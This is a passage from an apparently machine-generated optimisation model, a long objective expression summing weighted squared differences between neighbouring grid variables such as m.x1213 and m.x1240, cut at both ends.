8.11690209768664*m.x1240 - 8.11690209768664*m.x1213)**2 + (1.3*m.x1214 - 1.3*m.x1213)**2) +
3.68514062185326*((8.11690209768664*m.x1241 - 8.11690209768664*m.x1214)**2 + (1.3*m.x1215 - 1.3*
m.x1214)**2) + 3.7692665538586*((8.11690209768664*m.x1243 - 8.11690209768664*m.x1216)**2 + (1.3*
m.x1217 - 1.3*m.x1216)**2) + 3.7692665538586*((8.11690209768664*m.x1244 - 8.11690209768664*
m.x1217)**2 + (1.3*m.x1218 - 1.3*m.x1217)**2) + 3.7692665538586*((8.11690209768664*m.x1245 -
8.11690209768664*m.x1218)**2 + (1.3*m.x1219 - 1.3*m.x1218)**2) + 3.7692665538586*((
8.11690209768664*m.x1246 - 8.11690209768664*m.x1219)**2 + (1.3*m.x1220 - 1.3*m.x1219)**2) +
3.7692665538586*((8.11690209768664*m.x1247 - 8.11690209768664*m.x1220)**2 + (1.3*m.x1221 - 1.3*
m.x1220)**2) + 3.7692665538586*((8.11690209768664*m.x1248 - 8.11690209768664*m.x1221)**2 + (1.3*
m.x1222 - 1.3*m.x1221)**2) + 3.7692665538586*((8.11690209768664*m.x1249 - 8.11690209768664*
m.x1222)**2 + (1.3*m.x1223 - 1.3*m.x1222)**2) + 3.7692665538586*((8.11690209768664*m.x1250 -
8.11690209768664*m.x1223)**2 + (1.3*m.x1224 - 1.3*m.x1223)**2) + 3.7692665538586*((
8.11690209768664*m.x1251 - 8.11690209768664*m.x1224)**2 + (1.3*m.x1225 - 1.3*m.x1224)**2) +
3.7692665538586*((8.11690209768664*m.x1252 - 8.11690209768664*m.x1225)**2 + (1.3*m.x1226 - 1.3*
m.x1225)**2) + 3.7692665538586*((8.11690209768664*m.x1253 - 8.11690209768664*m.x1226)**2 + (1.3*
m.x1227 - 1.3*m.x1226)**2) + 3.7692665538586*((8.11690209768664*m.x1254 - 8.11690209768664*
m.x1227)**2 + (1.3*m.x1228 - 1.3*m.x1227)**2) + 3.7692665538586*((8.11690209768664*m.x1255 -
8.11690209768664*m.x1228)**2 + (1.3*m.x1229 - 1.3*m.x1228)**2) + 3.7692665538586*((
8.11690209768664*m.x1256 - 8.11690209768664*m.x1229)**2 + (1.3*m.x1230 - 1.3*m.x1229)**2) +
3.7692665538586*((8.11690209768664*m.x1257 - 8.11690209768664*m.x1230)**2 + (1.3*m.x1231 - 1.3*
m.x1230)**2) + 3.7692665538586*((8.11690209768664*m.x1258 - 8.11690209768664*m.x1231)**2 + (1.3*
m.x1232 - 1.3*m.x1231)**2) + 3.7692665538586*((8.11690209768664*m.x1259 - 8.11690209768664*
m.x1232)**2 + (1.3*m.x1233 - 1.3*m.x1232)**2) + 3.7692665538586*((8.11690209768664*m.x1260 -
8.11690209768664*m.x1233)**2 + (1.3*m.x1234 - 1.3*m.x1233)**2) + 3.7692665538586*((
8.11690209768664*m.x1261 - 8.11690209768664*m.x1234)**2 + (1.3*m.x1235 - 1.3*m.x1234)**2) +
3.7692665538586*((8.11690209768664*m.x1262 - 8.11690209768664*m.x1235)**2 + (1.3*m.x1236 - 1.3*
m.x1235)**2) + 3.7692665538586*((8.11690209768664*m.x1263 - 8.11690209768664*m.x1236)**2 + (1.3*
m.x1237 - 1.3*m.x1236)**2) + 3.7692665538586*((8.11690209768664*m.x1264 - 8.11690209768664*
m.x1237)**2 + (1.3*m.x1238 - 1.3*m.x1237)**2) + 3.7692665538586*((8.11690209768664*m.x1265 -
8.11690209768664*m.x1238)**2 + (1.3*m.x1239 - 1.3*m.x1238)**2) + 3.7692665538586*((
8.11690209768664*m.x1266 - 8.11690209768664*m.x1239)**2 + (1.3*m.x1240 - 1.3*m.x1239)**2) +
3.7692665538586*((8.11690209768664*m.x1267 - 8.11690209768664*m.x1240)**2 + (1.3*m.x1241 - 1.3*
m.x1240)**2) + 3.7692665538586*((8.11690209768664*m.x1268 - 8.11690209768664*m.x1241)**2 + (1.3*
m.x1242 - 1.3*m.x1241)**2) + 3.84193404586726*((8.11690209768664*m.x1270 - 8.11690209768664*
m.x1243)**2 + (1.3*m.x1244 - 1.3*m.x1243)**2) + 3.84193404586726*((8.11690209768664*m.x1271 -
8.11690209768664*m.x1244)**2 + (1.3*m.x1245 - 1.3*m.x1244)**2) + 3.84193404586726*((
8.11690209768664*m.x1272 - 8.11690209768664*m.x1245)**2 + (1.3*m.x1246 - 1.3*m.x1245)**2) +
3.84193404586726*((8.11690209768664*m.x1273 - 8.11690209768664*m.x1246)**2 + (1.3*m.x1247 - 1.3*
m.x1246)**2) + 3.84193404586726*((8.11690209768664*m.x1274 - 8.11690209768664*m.x1247)**2 + (1.3*
m.x1248 - 1.3*m.x1247)**2) + 3.84193404586726*((8.11690209768664*m.x1275 - 8.11690209768664*
m.x1248)**2 + (1.3*m.x1249 - 1.3*m.x1248)**2) + 3.84193404586726*((8.11690209768664*m.x1276 -
8.11690209768664*m.x1249)**2 + (1.3*m.x1250 - 1.3*m.x1249)**2) + 3.84193404586726*((
8.11690209768664*m.x1277 - 8.11690209768664*m.x1250)**2 + (1.3*m.x1251 - 1.3*m.x1250)**2) +
3.84193404586726*((8.11690209768664*m.x1278 - 8.11690209768664*m.x1251)**2 + (1.3*m.x1252 - 1.3*
m.x1251)**2) + 3.84193404586726*((8.11690209768664*m.x1279 - 8.11690209768664*m.x1252)**2 + (1.3*
m.x1253 - 1.3*m.x1252)**2) + 3.84193404586726*((8.11690209768664*m.x1280 - 8.11690209768664*
m.x1253)**2 + (1.3*m.x1254 - 1.3*m.x1253)**2) + 3.84193404586726*((8.11690209768664*m.x1281 -
8.11690209768664*m.x1254)**2 + (1.3*m.x1255 - 1.3*m.x1254)**2) + 3.84193404586726*((
8.11690209768664*m.x1282 - 8.11690209768664*m.x1255)**2 + (1.3*m.x1256 - 1.3*m.x1255)**2) +
3.84193404586726*((8.11690209768664*m.x1283 - 8.11690209768664*m.x1256)**2 + (1.3*m.x1257 - 1.3*
m.x1256)**2) + 3.84193404586726*((8.11690209768664*m.x1284 - 8.11690209768664*m.x1257)**2 + (1.3*
m.x1258 - 1.3*m.x1257)**2) + 3.84193404586726*((8.11690209768664*m.x1285 - 8.11690209768664*
m.x1258)**2 + (1.3*m.x1259 - 1.3*m.x1258)**2) + 3.84193404586726*((8.11690209768664*m.x1286 -
8.11690209768664*m.x1259)**2 + (1.3*m.x1260 - 1.3*m.x1259)**2) + 3.84193404586726*((
8.11690209768664*m.x1287 - 8.11690209768664*m.x1260)**2 + (1.3*m.x1261 - 1.3*m.x1260)**2) +
3.84193404586726*((8.11690209768664*m.x1288 - 8.11690209768664*m.x1261)**2 + (1.3*m.x1262 - 1.3*
m.x1261)**2) + 3.84193404586726*((8.11690209768664*m.x1289 - 8.11690209768664*m.x1262)**2 + (1.3*
m.x1263 - 1.3*m.x1262)**2) + 3.84193404586726*((8.11690209768664*m.x1290 - 8.11690209768664*
m.x1263)**2 + (1.3*m.x1264 - 1.3*m.x1263)**2) + 3.84193404586726*((8.11690209768664*m.x1291 -
8.11690209768664*m.x1264)**2 + (1.3*m.x1265 - 1.3*m.x1264)**2) + 3.84193404586726*((
8.11690209768664*m.x1292 - 8.11690209768664*m.x1265)**2 + (1.3*m.x1266 - 1.3*m.x1265)**2) +
3.84193404586726*((8.11690209768664*m.x1293 - 8.11690209768664*m.x1266)**2 + (1.3*m.x1267 - 1.3*
m.x1266)**2) + 3.84193404586726*((8.11690209768664*m.x1294 - 8.11690209768664*m.x1267)**2 + (1.3*
m.x1268 - 1.3*m.x1267)**2) + 3.84193404586726*((8.11690209768664*m.x1295 - 8.11690209768664*
m.x1268)**2 + (1.3*m.x1269 - 1.3*m.x1268)**2) + 3.90154814179696*((8.11690209768664*m.x1297 -
8.11690209768664*m.x1270)**2 + (1.3*m.x1271 - 1.3*m.x1270)**2) + 3.90154814179696*((
8.11690209768664*m.x1298 - 8.11690209768664*m.x1271)**2 + (1.3*m.x1272 - 1.3*m.x1271)**2) +
3.90154814179696*((8.11690209768664*m.x1299 - 8.11690209768664*m.x1272)**2 + (1.3*m.x1273 - 1.3*
m.x1272)**2) + 3.90154814179696*((8.11690209768664*m.x1300 - 8.11690209768664*m.x1273)**2 + (1.3*
m.x1274 - 1.3*m.x1273)**2) + 3.90154814179696*((8.11690209768664*m.x1301 - 8.11690209768664*
m.x1274)**2 + (1.3*m.x1275 - 1.3*m.x1274)**2) + 3.90154814179696*((8.11690209768664*m.x1302 -
8.11690209768664*m.x1275)**2 + (1.3*m.x1276 - 1.3*m.x1275)**2) + 3.90154814179696*((
8.11690209768664*m.x1303 - 8.11690209768664*m.x1276)**2 + (1.3*m.x1277 - 1.3*m.x1276)**2) +
3.90154814179696*((8.11690209768664*m.x1304 - 8.11690209768664*m.x1277)**2 + (1.3*m.x1278 - 1.3*
m.x1277)**2) + 3.90154814179696*((8.11690209768664*m.x1305 - 8.11690209768664*m.x1278)**2 + (1.3*
m.x1279 - 1.3*m.x1278)**2) + 3.90154814179696*((8.11690209768664*m.x1306 - 8.11690209768664*
m.x1279)**2 + (1.3*m.x1280 - 1.3*m.x1279)**2) + 3.90154814179696*((8.11690209768664*m.x1307 -
8.11690209768664*m.x1280)**2 + (1.3*m.x1281 - 1.3*m.x1280)**2) + 3.90154814179696*((
8.11690209768664*m.x1308 - 8.11690209768664*m.x1281)**2 + (1.3*m.x1282 - 1.3*m.x1281)**2) +
3.90154814179696*((8.11690209768664*m.x1309 - 8.11690209768664*m.x1282)**2 + (1.3*m.x1283 - 1.3*
m.x1282)**2) + 3.90154814179696*((8.11690209768664*m.x1310 - 8.11690209768664*m.x1283)**2 + (1.3*
m.x1284 - 1.3*m.x1283)**2) + 3.90154814179696*((8.11690209768664*m.x1311 - 8.11690209768664*
m.x1284)**2 + (1.3*m.x1285 - 1.3*m.x1284)**2) + 3.90154814179696*((8.11690209768664*m.x1312 -
8.11690209768664*m.x1285)**2 + (1.3*m.x1286 - 1.3*m.x1285)**2) + 3.90154814179696*((
8.11690209768664*m.x1313 - 8.11690209768664*m.x1286)**2 + (1.3*m.x1287 - 1.3*m.x1286)**2) +
3.90154814179696*((8.11690209768664*m.x1314 - 8.11690209768664*m.x1287)**2 + (1.3*m.x1288 - 1.3*
m.x1287)**2) + 3.90154814179696*((8.11690209768664*m.x1315 - 8.11690209768664*m.x1288)**2 + (1.3*
m.x1289 - 1.3*m.x1288)**2) + 3.90154814179696*((8.11690209768664*m.x1316 - 8.11690209768664*
m.x1289)**2 + (1.3*m.x1290 - 1.3*m.x1289)**2) + 3.90154814179696*((8.11690209768664*m.x1317 -
8.11690209768664*m.x1290)**2 + (1.3*m.x1291 - 1.3*m.x1290)**2) + 3.90154814179696*((
8.11690209768664*m.x1318 - 8.11690209768664*m.x1291)**2 + (1.3*m.x1292 - 1.3*m.x1291)**2) +
3.90154814179696*((8.11690209768664*m.x1319 - 8.11690209768664*m.x1292)**2 + (1.3*m.x1293 - 1.3*
m.x1292)**2) + 3.90154814179696*((8.11690209768664*m.x1320 - 8.11690209768664*m.x1293)**2 + (1.3*
m.x1294 - 1.3*m.x1293)**2) + 3.90154814179696*((8.11690209768664*m.x1321 - 8.11690209768664*
m.x1294)**2 + (1.3*m.x1295 - 1.3*m.x1294)**2) + 3.90154814179696*((8.11690209768664*m.x1322 -
8.11690209768664*m.x1295)**2 + (1.3*m.x1296 - 1.3*m.x1295)**2) + 3.94677031865286*((
8.11690209768664*m.x1324 - 8.11690209768664*m.x1297)**2 + (1.3*m.x1298 - 1.3*m.x1297)**2) +
3.94677031865286*((8.11690209768664*m.x1325 - 8.11690209768664*m.x1298)**2 + (1.3*m.x1299 - 1.3*
m.x1298)**2) + 3.94677031865286*((8.11690209768664*m.x1326 - 8.11690209768664*m.x1299)**2 + (1.3*
m.x1300 - 1.3*m.x1299)**2) + 3.94677031865286*((8.11690209768664*m.x1327 - 8.11690209768664*
m.x1300)**2 + (1.3*m.x1301 - 1.3*m.x1300)**2) + 3.94677031865286*((8.11690209768664*m.x1328 -
8.11690209768664*m.x1301)**2 + (1.3*m.x1302 - 1.3*m.x1301)**2) + 3.94677031865286*((
8.11690209768664*m.x1329 - 8.11690209768664*m.x1302)**2 + (1.3*m.x1303 - 1.3*m.x1302)**2) +
3.94677031865286*((8.11690209768664*m.x1330 - 8.11690209768664*m.x1303)**2 + (1.3*m.x1304 - 1.3*
m.x1303)**2) + 3.94677031865286*((8.11690209768664*m.x1331 - 8.11690209768664*m.x1304)**2 + (1.3*
m.x1305 - 1.3*m.x1304)**2) + 3.94677031865286*((8.11690209768664*m.x1332 - 8.11690209768664*
m.x1305)**2 + (1.3*m.x1306 - 1.3*m.x1305)**2) + 3.94677031865286*((8.11690209768664*m.x1333 -
8.11690209768664*m.x1306)**2 + (1.3*m.x1307 - 1.3*m.x1306)**2) + 3.94677031865286*((
8.11690209768664*m.x1334 - 8.11690209768664*m.x1307)**2 + (1.3*m.x1308 - 1.3*m.x1307)**2) +
3.94677031865286*((8.11690209768664*m.x1335 - 8.11690209768664*m.x1308)**2 + (1.3*m.x1309 - 1.3*
m.x1308)**2) + 3.94677031865286*((8.11690209768664*m.x1336 - 8.11690209768664*m.x1309)**2 + (1.3*
m.x1310 - 1.3*m.x1309)**2) + 3.94677031865286*((8.11690209768664*m.x1337 - 8.11690209768664*
m.x1310)**2 + (1.3*m.x1311 - 1.3*m.x1310)**2) + 3.94677031865286*((8.11690209768664*m.x1338 -
8.11690209768664*m.x1311)**2 + (1.3*m.x1312 - 1.3*m.x1311)**2) + 3.94677031865286*((
8.11690209768664*m.x1339 - 8.11690209768664*m.x1312)**2 + (1.3*m.x1313 - 1.3*m.x1312)**2) +
3.94677031865286*((8.11690209768664*m.x1340 - 8.11690209768664*m.x1313)**2 + (1.3*m.x1314 - 1.3*
m.x1313)**2) + 3.94677031865286*((8.11690209768664*m.x1341 - 8.11690209768664*m.x1314)**2 + (1.3*
m.x1315 - 1.3*m.x1314)**2) + 3.94677031865286*((8.11690209768664*m.x1342 - 8.11690209768664*
m.x1315)**2 + (1.3*m.x1316 - 1.3*m.x1315)**2) + 3.94677031865286*((8.11690209768664*m.x1343 -
8.11690209768664*m.x1316)**2 + (1.3*m.x1317 - 1.3*m.x1316)**2) + 3.94677031865286*((
8.11690209768664*m.x1344 - 8.11690209768664*m.x1317)**2 + (1.3*m.x1318 - 1.3*m.x1317)**2) +
3.94677031865286*((8.11690209768664*m.x1345 - 8.11690209768664*m.x1318)**2 + (1.3*m.x1319 - 1.3*
m.x1318)**2) + 3.94677031865286*((8.11690209768664*m.x1346 - 8.11690209768664*m.x1319)**2 + (1.3*
m.x1320 - 1.3*m.x1319)**2) + 3.94677031865286*((8.11690209768664*m.x1347 - 8.11690209768664*
m.x1320)**2 + (1.3*m.x1321 - 1.3*m.x1320)**2) + 3.94677031865286*((8.11690209768664*m.x1348 -
8.11690209768664*m.x1321)**2 + (1.3*m.x1322 - 1.3*m.x1321)**2) + 3.94677031865286*((
8.11690209768664*m.x1349 - 8.11690209768664*m.x1322)**2 + (1.3*m.x1323 - 1.3*m.x1322)**2) +
3.97656744441955*((8.11690209768664*m.x1351 - 8.11690209768664*m.x1324)**2 + (1.3*m.x1325 - 1.3*
m.x1324)**2) + 3.97656744441955*((8.11690209768664*m.x1352 - 8.11690209768664*m.x1325)**2 + (1.3*
m.x1326 - 1.3*m.x1325)**2) + 3.97656744441955*((8.11690209768664*m.x1353 - 8.11690209768664*
m.x1326)**2 + (1.3*m.x1327 - 1.3*m.x1326)**2) + 3.97656744441955*((8.11690209768664*m.x1354 -
8.11690209768664*m.x1327)**2 + (1.3*m.x1328 - 1.3*m.x1327)**2) + 3.97656744441955*((
8.11690209768664*m.x1355 - 8.11690209768664*m.x1328)**2 + (1.3*m.x1329 - 1.3*m.x1328)**2) +
3.97656744441955*((8.11690209768664*m.x1356 - 8.11690209768664*m.x1329)**2 + (1.3*m.x1330 - 1.3*
m.x1329)**2) + 3.97656744441955*((8.11690209768664*m.x1357 - 8.11690209768664*m.x1330)**2 + (1.3*
m.x1331 - 1.3*m.x1330)**2) + 3.97656744441955*((8.11690209768664*m.x1358 - 8.11690209768664*
m.x1331)**2 + (1.3*m.x1332 - 1.3*m.x1331)**2) + 3.97656744441955*((8.11690209768664*m.x1359 -
8.11690209768664*m.x1332)**2 + (1.3*m.x1333 - 1.3*m.x1332)**2) + 3.97656744441955*((
8.11690209768664*m.x1360 - 8.11690209768664*m.x1333)**2 + (1.3*m.x1334 - 1.3*m.x1333)**2) +
3.97656744441955*((8.11690209768664*m.x1361 - 8.11690209768664*m.x1334)**2 + (1.3*m.x1335 - 1.3*
m.x1334)**2) + 3.97656744441955*((8.11690209768664*m.x1362 - 8.11690209768664*m.x1335)**2 + (1.3*
m.x1336 - 1.3*m.x1335)**2) + 3.97656744441955*((8.11690209768664*m.x1363 - 8.11690209768664*
m.x1336)**2 + (1.3*m.x1337 - 1.3*m.x1336)**2) + 3.97656744441955*((8.11690209768664*m.x1364 -
8.11690209768664*m.x1337)**2 + (1.3*m.x1338 - 1.3*m.x1337)**2) + 3.97656744441955*((
8.11690209768664*m.x1365 - 8.11690209768664*m.x1338)**2 + (1.3*m.x1339 - 1.3*m.x1338)**2) +
3.97656744441955*((8.11690209768664*m.x1366 - 8.11690209768664*m.x1339)**2 + (1.3*m.x1340 - 1.3*
m.x1339)**2) + 3.97656744441955*((8.11690209768664*m.x1367 - 8.11690209768664*m.x1340)**2 + (1.3*
m.x1341 - 1.3*m.x1340)**2) + 3.97656744441955*((8.11690209768664*m.x1368 - 8.11690209768664*
m.x1341)**2 + (1.3*m.x1342 - 1.3*m.x1341)**2) + 3.97656744441955*((8.11690209768664*m.x1369 -
8.11690209768664*m.x1342)**2 + (1.3*m.x1343 - 1.3*m.x1342)**2) + 3.97656744441955*((
8.11690209768664*m.x1370 - 8.11690209768664*m.x1343)**2 + (1.3*m.x1344 - 1.3*m.x1343)**2) +
3.97656744441955*((8.11690209768664*m.x1371 - 8.11690209768664*m.x1344)**2 + (1.3*m.x1345 - 1.3*
m.x1344)**2) + 3.97656744441955*((8.11690209768664*m.x1372 - 8.11690209768664*m.x1345)**2 + (1.3*
m.x1346 - 1.3*m.x1345)**2) + 3.97656744441955*((8.11690209768664*m.x1373 - 8.11690209768664*
m.x1346)**2 + (1.3*m.x1347 - 1.3*m.x1346)**2) + 3.97656744441955*((8.11690209768664*m.x1374 -
8.11690209768664*m.x1347)**2 + (1.3*m.x1348 - 1.3*m.x1347)**2) + 3.97656744441955*((
8.11690209768664*m.x1375 - 8.11690209768664*m.x1348)**2 + (1.3*m.x1349 - 1.3*m.x1348)**2) +
3.97656744441955*((8.11690209768664*m.x1376 - 8.11690209768664*m.x1349)**2 + (1.3*m.x1350 - 1.3*
m.x1349)**2) + 3.99025054038171*((8.11690209768664*m.x1378 - 8.11690209768664*m.x1351)**2 + (1.3*
m.x1352 - 1.3*m.x1351)**2) + 3.99025054038171*((8.11690209768664*m.x1379 - 8.11690209768664*
m.x1352)**2 + (1.3*m.x1353 - 1.3*m.x1352)**2) + 3.99025054038171*((8.11690209768664*m.x1380 -
8.11690209768664*m.x1353)**2 + (1.3*m.x1354 - 1.3*m.x1353)**2) + 3.99025054038171*((
8.11690209768664*m.x1381 - 8.11690209768664*m.x1354)**2 + (1.3*m.x1355 - 1.3*m.x1354)**2) +
3.99025054038171*((8.11690209768664*m.x1382 - 8.11690209768664*m.x1355)**2 + (1.3*m.x1356 - 1.3*
m.x1355)**2) + 3.99025054038171*((8.11690209768664*m.x1383 - 8.11690209768664*m.x1356)**2 + (1.3*
m.x1357 - 1.3*m.x1356)**2) + 3.99025054038171*((8.11690209768664*m.x1384 - 8.11690209768664*
m.x1357)**2 + (1.3*m.x1358 - 1.3*m.x1357)**2) + 3.99025054038171*((8.11690209768664*m.x1385 -
8.11690209768664*m.x1358)**2 + (1.3*m.x1359 - 1.3*m.x1358)**2) + 3.99025054038171*((
8.11690209768664*m.x1386 - 8.11690209768664*m.x1359)**2 + (1.3*m.x1360 - 1.3*m.x1359)**2) +
3.99025054038171*((8.11690209768664*m.x1387 - 8.11690209768664*m.x1360)**2 + (1.3*m.x1361 - 1.3*
m.x1360)**2) + 3.99025054038171*((8.11690209768664*m.x1388 - 8.11690209768664*m.x1361)**2 + (1.3*
m.x1362 - 1.3*m.x1361)**2) + 3.99025054038171*((8.11690209768664*m.x1389 - 8.11690209768664*
m.x1362)**2 + (1.3*m.x1363 - 1.3*m.x1362)**2) + 3.99025054038171*((8.11690209768664*m.x1390 -
8.11690209768664*m.x1363)**2 + (1.3*m.x1364 - 1.3*m.x1363)**2) + 3.99025054038171*((
8.11690209768664*m.x1391 - 8.11690209768664*m.x1364)**2 + (1.3*m.x1365 - 1.3*m.x1364)**2) +
3.99025054038171*((8.11690209768664*m.x1392 - 8.11690209768664*m.x1365)**2 + (1.3*m.x1366 - 1.3*
m.x1365)**2) + 3.99025054038171*((8.11690209768664*m.x1393 - 8.11690209768664*m.x1366)**2 + (1.3*
m.x1367 - 1.3*m.x1366)**2) + 3.99025054038171*((8.11690209768664*m.x1394 - 8.11690209768664*
m.x1367)**2 + (1.3*m.x1368 - 1.3*m.x1367)**2) + 3.99025054038171*((8.11690209768664*m.x1395 -
8.11690209768664*m.x1368)**2 + (1.3*m.x1369 - 1.3*m.x1368)**2) + 3.99025054038171*((
8.11690209768664*m.x1396 - 8.11690209768664*m.x1369)**2 + (1.3*m.x1370 - 1.3*m.x1369)**2) +
3.99025054038171*((8.11690209768664*m.x1397 - 8.11690209768664*m.x1370)**2 + (1.3*m.x1371 - 1.3*
m.x1370)**2) + 3.99025054038171*((8.11690209768664*m.x1398 - 8.11690209768664*m.x1371)**2 + (1.3*
m.x1372 - 1.3*m.x1371)**2) + 3.99025054038171*((8.11690209768664*m.x1399 - 8.11690209768664*
m.x1372)**2 + (1.3*m.x1373 - 1.3*m.x1372)**2) + 3.99025054038171*((8.11690209768664*m.x1400 -
8.11690209768664*m.x1373)**2 + (1.3*m.x1374 - 1.3*m.x1373)**2) + 3.99025054038171*((
8.11690209768664*m.x1401 - 8.11690209768664*m.x1374)**2 + (1.3*m.x1375 - 1.3*m.x1374)**2) +
3.99025054038171*((8.11690209768664*m.x1402 - 8.11690209768664*m.x1375)**2 + (1.3*m.x1376 - 1.3*
m.x1375)**2) + 3.99025054038171*((8.11690209768664*m.x1403 - 8.11690209768664*m.x1376)**2 + (1.3*
m.x1377 - 1.3*m.x1376)**2)) + 0.00789741742983861*(5.31850108076342*((8.11690209768664*m.x2 -
8.11690209768664*m.x29)**2 + (1.3*m.x28 - 1.3*m.x29)**2) + 5.31850108076342*((8.11690209768664*
m.x3 - 8.11690209768664*m.x30)**2 + (1.3*m.x29 - 1.3*m.x30)**2) + 5.31850108076342*((
8.11690209768664*m.x4 - 8.11690209768664*m.x31)**2 + (1.3*m.x30 - 1.3*m.x31)**2) +
5.31850108076342*((8.11690209768664*m.x5 - 8.11690209768664*m.x32)**2 + (1.3*m.x31 - 1.3*m.x32)**
2) + 5.31850108076342*((8.11690209768664*m.x6 - 8.11690209768664*m.x33)**2 + (1.3*m.x32 - 1.3*
m.x33)**2) + 5.31850108076342*((8.11690209768664*m.x7 - 8.11690209768664*m.x34)**2 + (1.3*m.x33
- 1.3*m.x34)**2) + 5.31850108076342*((8.11690209768664*m.x8 - 8.11690209768664*m.x35)**2 + (1.3*
m.x34 - 1.3*m.x35)**2) + 5.31850108076342*((8.11690209768664*m.x9 - 8.11690209768664*m.x36)**2 +
(1.3*m.x35 - 1.3*m.x36)**2) + 5.31850108076342*((8.11690209768664*m.x10 - 8.11690209768664*m.x37)
**2 + (1.3*m.x36 - 1.3*m.x37)**2) + 5.31850108076342*((8.11690209768664*m.x11 - 8.11690209768664*
m.x38)**2 + (1.3*m.x37 - 1.3*m.x38)**2) + 5.31850108076342*((8.11690209768664*m.x12 -
8.11690209768664*m.x39)**2 + (1.3*m.x38 - 1.3*m.x39)**2) + 5.31850108076342*((8.11690209768664*
m.x13 - 8.11690209768664*m.x40)**2 + (1.3*m.x39 - 1.3*m.x40)**2) + 5.31850108076342*((
8.11690209768664*m.x14 - 8.11690209768664*m.x41)**2 + (1.3*m.x40 - 1.3*m.x41)**2) +
5.31850108076342*((8.11690209768664*m.x15 - 8.11690209768664*m.x42)**2 + (1.3*m.x41 - 1.3*m.x42)
**2) + 5.31850108076342*((8.11690209768664*m.x16 - 8.11690209768664*m.x43)**2 + (1.3*m.x42 - 1.3*
m.x43)**2) + 5.31850108076342*((8.11690209768664*m.x17 - 8.11690209768664*m.x44)**2 + (1.3*m.x43
- 1.3*m.x44)**2) + 5.31850108076342*((8.11690209768664*m.x18 - 8.11690209768664*m.x45)**2 + (1.3
*m.x44 - 1.3*m.x45)**2) + 5.31850108076342*((8.11690209768664*m.x19 - 8.11690209768664*m.x46)**2
+ (1.3*m.x45 - 1.3*m.x46)**2) + 5.31850108076342*((8.11690209768664*m.x20 - 8.11690209768664*
m.x47)**2 + (1.3*m.x46 - 1.3*m.x47)**2) + 5.31850108076342*((8.11690209768664*m.x21 -
8.11690209768664*m.x48)**2 + (1.3*m.x47 - 1.3*m.x48)**2) + 5.31850108076342*((8.11690209768664*
m.x22 - 8.11690209768664*m.x49)**2 + (1.3*m.x48 - 1.3*m.x49)**2) + 5.31850108076342*((
8.11690209768664*m.x23 - 8.11690209768664*m.x50)**2 + (1.3*m.x49 - 1.3*m.x50)**2) +
5.31850108076342*((8.11690209768664*m.x24 - 8.11690209768664*m.x51)**2 + (1.3*m.x50 - 1.3*m.x51)
**2) + 5.31850108076342*((8.11690209768664*m.x25 - 8.11690209768664*m.x52)**2 + (1.3*m.x51 - 1.3*
m.x52)**2) + 5.31850108076342*((8.11690209768664*m.x26 - 8.11690209768664*m.x53)**2 + (1.3*m.x52
- 1.3*m.x53)**2) + 5.31850108076342*((8.11690209768664*m.x27 - 8.11690209768664*m.x54)**2 + (1.3
*m.x53 - 1.3*m.x54)**2) + 5.29663380807566*((8.11690209768664*m.x29 - 8.11690209768664*m.x56)**2
+ (1.3*m.x55 - 1.3*m.x56)**2) + 5.29663380807566*((8.11690209768664*m.x30 - 8.11690209768664*
m.x57)**2 + (1.3*m.x56 - 1.3*m.x57)**2) + 5.29663380807566*((8.11690209768664*m.x31 -
8.11690209768664*m.x58)**2 + (1.3*m.x57 - 1.3*m.x58)**2) + 5.29663380807566*((8.11690209768664*
m.x32 - 8.11690209768664*m.x59)**2 + (1.3*m.x58 - 1.3*m.x59)**2) + 5.29663380807566*((
8.11690209768664*m.x33 - 8.11690209768664*m.x60)**2 + (1.3*m.x59 - 1.3*m.x60)**2) +
5.29663380807566*((8.11690209768664*m.x34 - 8.11690209768664*m.x61)**2 + (1.3*m.x60 - 1.3*m.x61)
**2) + 5.29663380807566*((8.11690209768664*m.x35 - 8.11690209768664*m.x62)**2 + (1.3*m.x61 - 1.3*
m.x62)**2) + 5.29663380807566*((8.11690209768664*m.x36 - 8.11690209768664*m.x63)**2 + (1.3*m.x62
- 1.3*m.x63)**2) + 5.29663380807566*((8.11690209768664*m.x37 - 8.11690209768664*m.x64)**2 + (1.3
*m.x63 - 1.3*m.x64)**2) + 5.29663380807566*((8.11690209768664*m.x38 - 8.11690209768664*m.x65)**2
+ (1.3*m.x64 - 1.3*m.x65)**2) + 5.29663380807566*((8.11690209768664*m.x39 - 8.11690209768664*
m.x66)**2 + (1.3*m.x65 - 1.3*m.x66)**2) + 5.29663380807566*((8.11690209768664*m.x40 -
8.11690209768664*m.x67)**2 + (1.3*m.x66 - 1.3*m.x67)**2) + 5.29663380807566*((8.11690209768664*
m.x41 - 8.11690209768664*m.x68)**2 + (1.3*m.x67 - 1.3*m.x68)**2) + 5.29663380807566*((
8.11690209768664*m.x42 - 8.11690209768664*m.x69)**2 + (1.3*m.x68 - 1.3*m.x69)**2) +
5.29663380807566*((8.11690209768664*m.x43 - 8.11690209768664*m.x70)**2 + (1.3*m.x69 - 1.3*m.x70)
**2) + 5.29663380807566*((8.11690209768664*m.x44 - 8.11690209768664*m.x71)**2 + (1.3*m.x70 - 1.3*
m.x71)**2) + 5.29663380807566*((8.11690209768664*m.x45 - 8.11690209768664*m.x72)**2 + (1.3*m.x71
- 1.3*m.x72)**2) + 5.29663380807566*((8.11690209768664*m.x46 - 8.11690209768664*m.x73)**2 + (1.3
*m.x72 - 1.3*m.x73)**2) + 5.29663380807566*((8.11690209768664*m.x47 - 8.11690209768664*m.x74)**2
+ (1.3*m.x73 - 1.3*m.x74)**2) + 5.29663380807566*((8.11690209768664*m.x48 - 8.11690209768664*
m.x75)**2 + (1.3*m.x74 - 1.3*m.x75)**2) + 5.29663380807566*((8.11690209768664*m.x49 -
8.11690209768664*m.x76)**2 + (1.3*m.x75 - 1.3*m.x76)**2) + 5.29663380807566*((8.11690209768664*
m.x50 - 8.11690209768664*m.x77)**2 + (1.3*m.x76 - 1.3*m.x77)**2) + 5.29663380807566*((
8.11690209768664*m.x51 - 8.11690209768664*m.x78)**2 + (1.3*m.x77 - 1.3*m.x78)**2) +
5.29663380807566*((8.11690209768664*m.x52 - 8.11690209768664*m.x79)**2 + (1.3*m.x78 - 1.3*m.x79)
**2) + 5.29663380807566*((8.11690209768664*m.x53 - 8.11690209768664*m.x80)**2 + (1.3*m.x79 - 1.3*
m.x80)**2) + 5.29663380807566*((8.11690209768664*m.x54 - 8.11690209768664*m.x81)**2 + (1.3*m.x80
- 1.3*m.x81)**2) + 5.25340790999347*((8.11690209768664*m.x56 - 8.11690209768664*m.x83)**2 + (1.3
*m.x82 - 1.3*m.x83)**2) + 5.25340790999347*((8.11690209768664*m.x57 - 8.11690209768664*m.x84)**2
